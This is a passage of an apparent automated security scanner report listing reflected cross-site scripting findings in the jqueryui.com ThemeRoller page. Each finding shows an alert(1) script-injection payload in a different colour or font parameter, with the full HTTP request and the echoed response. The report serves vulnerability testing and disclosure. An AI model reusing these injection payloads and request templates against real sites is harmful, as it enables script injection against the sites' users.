<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

1.92. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74466"><script>alert(1)</script>e3901bf7849 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849" type="text/css" media="all" />
...[SNIP]...

1.93. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce12a"><script>alert(1)</script>57ff54b00b6 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

1.94. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebeba"><script>alert(1)</script>9e316bab61c was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

1.95. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f85e"><script>alert(1)</script>5ce0760a9c0 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

1.96. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65d0"><script>alert(1)</script>042902ea54a was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.97. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7f9"><script>alert(1)</script>680216dd329 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

1.98. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac58"><script>alert(1)</script>288ea6641f4 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

1.99. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1729"><script>alert(1)</script>d30e2b92665 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

1.100. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133c"><script>alert(1)</script>1841d7744ed was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

1.101. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 988bb"><script>alert(1)</script>8a2c7460782 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcef